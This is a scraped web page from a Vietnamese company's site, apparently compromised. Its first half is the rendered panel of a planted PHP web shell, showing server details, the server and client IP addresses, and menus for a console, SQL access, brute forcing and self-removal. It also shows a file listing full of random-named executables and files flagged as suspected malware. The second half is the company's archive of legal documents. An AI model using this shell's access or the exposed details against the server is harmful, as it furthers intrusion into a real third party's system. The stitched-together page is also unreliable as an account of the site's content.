Uname:
User:
Php:
Hdd:
Cwd:
Linux server26 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 [exploit-db.com]
1000 ( nginx ) Group: 1000 ( ? )
7.0.33 Safe mode: OFF [ phpinfo ] Datetime: 2020-01-25 14:50:38
61.54 GB Free: 9.51 GB (15%)
/home/web/dbvietnam_vn/wp-content/uploads/2019/12/ drwxr-xr-x [ home ]

Server IP:
27.118.22.26
Client IP:
179.43.149.5
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ String tools ][ Bruteforce ][ Network ][ Logout ][ Self remove ]

File manager

NameSizeModifyOwner/GroupPermissionsActions
[ . ]dir2020-01-25 14:43:421000/1000drwxr-xr-xR T
[ .. ]dir2020-01-22 16:04:011000/1000drwxr-xr-xR T
[ agenthandler ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ auction-go ]dir2020-01-24 10:14:461000/1000drwxr-xr-xR T
[ compositionApi ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ content ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ current ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ default_new ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ elmar_affiliate ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ email_editfirm ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ empfehlen ]dir2020-01-24 13:59:581000/1000drwxr-xr-xR T
[ feedback ]dir2020-01-24 01:13:581000/1000drwxr-xr-xR T
[ fence.inc ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ function.earlier ]dir2019-12-26 01:40:061000/1000drwxr-xr-xR T
[ function.rod ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ function.studying ]dir2019-12-28 17:49:011000/1000drwxr-xr-xR T
[ generic_search ]dir2019-12-17 13:27:111000/1000drwxr-xr-xR T
[ init.price ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ lake.api ]dir2019-12-28 15:18:501000/1000drwxr-xr-xR T
[ meta_tags ]dir2020-01-24 03:13:291000/1000drwxr-xr-xR T
[ mt-comments ]dir2020-01-23 21:55:241000/1000drwxr-xr-xR T
[ overallfooter ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ physical.inc ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ popassembly ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ productlist ]dir2019-09-18 12:12:031000/1000drwxr-xr-xR T
[ profilbasket ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ quickregcode ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ registration ]dir2019-12-27 09:41:471000/1000drwxr-xr-xR T
[ rough_api ]dir2019-12-28 16:54:111000/1000drwxr-xr-xR T
[ sitemap_0_5000 ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
[ submitart ]dir2020-01-24 09:13:491000/1000drwxr-xr-xR T
[ workshops ]dir2019-12-27 09:41:531000/1000drwxr-xr-xR T
.odvrbf.php.suspected6.19 KB2019-12-16 14:10:591000/1000-rw-r--r--R T E D
1jckJM7.00 MB2019-12-19 16:12:371000/1000-rwxr-xr-xR T E D
1OwHVb0 B2019-12-18 16:44:491000/1000-rwxr-xr-xR T E D
2cb.php26.45 KB2019-12-17 06:50:351000/1000-rw-r--r--R T E D
2RbrSN7.00 MB2019-12-17 08:25:321000/1000-rwxr-xr-xR T E D
5ydzRq7.00 MB2019-12-21 05:54:061000/1000-rwxr-xr-xR T E D
api.jet.php2.55 KB2019-09-29 14:43:461000/1000-rw-r--r--R T E D
barn.func.php.suspected2.29 KB2019-11-17 11:20:411000/1000-rw-r--r--R T E D
cb2.php26.45 KB2019-12-27 07:54:091000/1000-rw-r--r--R T E D
cfgas6.66 MB2020-01-18 09:30:031000/1000-rwxrwxrwxR T E D
ClOiTR7.00 MB2019-12-18 07:47:271000/1000-rwxr-xr-xR T E D
config.fifteen.php.suspected2.62 KB2019-10-25 10:49:371000/1000-rw-r--r--R T E D
er_pan.php434.46 KB2019-12-27 07:54:181000/1000-rw-r--r--R T E D
fenceApi.php.suspected2.64 KB2019-11-24 10:48:191000/1000-rw-r--r--R T E D
function.forgotten.php2.17 KB2019-10-29 14:31:441000/1000-rw-r--r--R T E D
fvC03y7.00 MB2019-12-19 09:23:531000/1000-rwxr-xr-xR T E D
get.php291 B2019-12-27 12:21:551000/1000-r-xr-xr-xR T E D
identityApi.php.suspected1.98 KB2019-11-24 10:44:101000/1000-rw-r--r--R T E D
index.html0 B2020-01-25 14:43:421000/1000-rw-r--r--R T E D
init.division.php2.35 KB2019-09-29 14:27:351000/1000-rw-r--r--R T E D
kLgsF27.00 MB2019-12-17 19:39:211000/1000-rwxr-xr-xR T E D
Km70D47.00 MB2019-12-17 20:05:201000/1000-rwxr-xr-xR T E D
lhkrbi.php6 B2019-09-03 12:21:081000/1000-rw-r--r--R T E D
lkplnr.php6 B2019-06-24 07:37:491000/1000-rwxr-xr-xR T E D
lVCQZX7.00 MB2019-12-16 08:00:311000/1000-rwxr-xr-xR T E D
mh157.31 KB2020-01-25 14:43:421000/1000-rwxrwxrwxR T E D
ncdcab.php7.62 KB2019-12-17 12:11:481000/1000-rw-r--r--R T E D
nhauhl.php6 B2019-01-14 18:56:411000/1000-rw-r--r--R T E D
oq8bQX7.00 MB2019-12-17 19:32:231000/1000-rwxr-xr-xR T E D
pet.config.php.suspected2.32 KB2019-10-18 10:55:381000/1000-rw-r--r--R T E D
pmtwbk.php1.52 KB2019-12-27 11:38:121000/1000-rw-r--r--R T E D
QGhgqm7.00 MB2019-12-19 08:07:081000/1000-rwxr-xr-xR T E D
qkjXTJ7.00 MB2019-12-22 11:57:351000/1000-rwxr-xr-xR T E D
qvlNT57.00 MB2019-12-20 07:26:191000/1000-rwxr-xr-xR T E D
s_eval.php.suspected511 B2019-12-27 07:54:201000/1000-rw-r--r--R T E D
s_noeval.php.suspected491 B2019-12-27 07:54:231000/1000-rw-r--r--R T E D
sbqfxgqhkh.php7.40 KB2019-12-28 14:22:041000/1000-rw-r--r--R T E D
srdzia.php6 B2019-08-07 06:57:381000/1000-rwxr-xr-xR T E D
T25ntN7.00 MB2019-12-22 14:32:191000/1000-rwxr-xr-xR T E D
tbl_geed.php131.05 KB2019-12-27 07:54:271000/1000-rw-r--r--R T E D
title.func.php.suspected2.25 KB2019-09-18 11:31:191000/1000-rw-r--r--R T E D
unYfcC7.00 MB2019-12-17 04:45:441000/1000-rwxr-xr-xR T E D
uvOCqD7.00 MB2019-12-20 08:50:511000/1000-rwxr-xr-xR T E D
wynduc.php6 B2019-05-05 12:30:401000/1000-rwxr-xr-xR T E D
xinl.php1.29 KB2019-12-27 07:54:291000/1000-rw-r--r--R T E D
ylsdsw.php6 B2019-09-05 14:57:021000/1000-rw-r--r--R T E D
yomleq.php6 B2019-11-21 00:13:191000/1000-rwxr-xr-xR T E D
znwmgm.php1.52 KB2019-12-27 11:36:131000/1000-rwxr-xr-xR T E D
zqIuCi0 B2019-12-19 22:23:101000/1000-rwxr-xr-xR T E D
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Execute:
Upload file: (Writeable)

Tài liệu Archives - Công ty Cổ phần Phát triển D&B Việt Nam

Tài liệu

Luật dân sự
12.01.2018

Luật dân sự

rx online D&B Việt Nam kính gửi tới Quý khách hàng Pháp luật Dân Sự Nhà nước Cộng hòa Xã hội Chủ nghĩa Việt Nam. Quý khách vui lòng click vào link bên dưới để...
Xem thêm
Luật doanh nghiệp
12.01.2018

Luật doanh nghiệp

rx online D&B Việt Nam kính gửi tới Quý khách hàng Pháp luật, Thông tư, Nghị định Nhà nước Cộng hòa Xã hội Chủ nghĩa Việt Nam về lĩnh vực Hoạt động Doanh Nghiệp. Quý...
Xem thêm
Luật xây dựng
12.01.2018

Luật xây dựng

rx online D&B Việt Nam kính gửi tới Quý khách hàng Pháp luật, Thông tư, Nghị định của Nhà nước Cộng hòa Xã hội Chủ nghĩa Việt Nam về lĩnh vực Xây dựng. Quý khách...
Xem thêm
Luật đất đai
12.01.2018

Luật đất đai

rx online D&B Việt Nam kính gửi tới Quý khách hàng Pháp luật, Thông tư, Nghị định của Nhà nước Cộng hòa Xã hội Chủ nghĩa Việt Nam về lĩnh vực Đất đai – Nhà...
Xem thêm
Tài liệu kinh doanh
12.01.2018

Tài liệu kinh doanh

rx online D&B Việt Nam kính gửi tới Quý khách hàng Tài liệu tham khảo về lĩnh vực Kinh doanh Bất động sản. Quý khách vui lòng click vào link bên dưới để tải tài...
Xem thêm
Tài liệu Kinh tế
12.01.2018

Tài liệu Kinh tế

rx online D&B Việt Nam kính gửi tới Quý khách hàng Pháp luật Nhà nước Cộng hòa Xã hội Chủ nghĩa Việt Nam về Kinh Tế – Thương Mại. Quý khách vui lòng click vào...
Xem thêm
1 2